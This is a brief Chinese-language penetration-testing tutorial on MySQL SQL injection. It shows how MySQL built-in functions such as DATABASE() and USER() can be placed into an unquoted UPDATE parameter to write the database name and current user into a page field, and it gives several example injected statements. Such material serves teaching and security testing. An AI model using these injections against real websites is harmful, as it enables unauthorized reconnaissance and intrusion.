在Access、SQL Server中注入时,用到的方法在MySQL中也能很好的得到发挥,在MySQL中有很多内置函数都可以直接用在SQL语句里,这样就可以试注入变得更加灵活,以得到更多关于系统的信息,
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
各个函数的具体作用大家可以查阅MySQL手册,注意下面这句UPDATE:
UPDATE article SET title=$title WHERE article=1
可以指定$title为以上的各个函数,因为没有被引号包含,所以函数能被正确地执行
UPDATE article SET title=DATABASE() WHERE id =1
#把当前的数据库名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把当前MySQL用户名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把当前MySQL用户名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把当前MySQL用户名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段
灵活运用MySQL内置的函数,可以获得不少有用的嘻嘻,比如数据库版本、名字、用户等,渗透中MySQL内置函数的应用》(https://www.unjs.com)。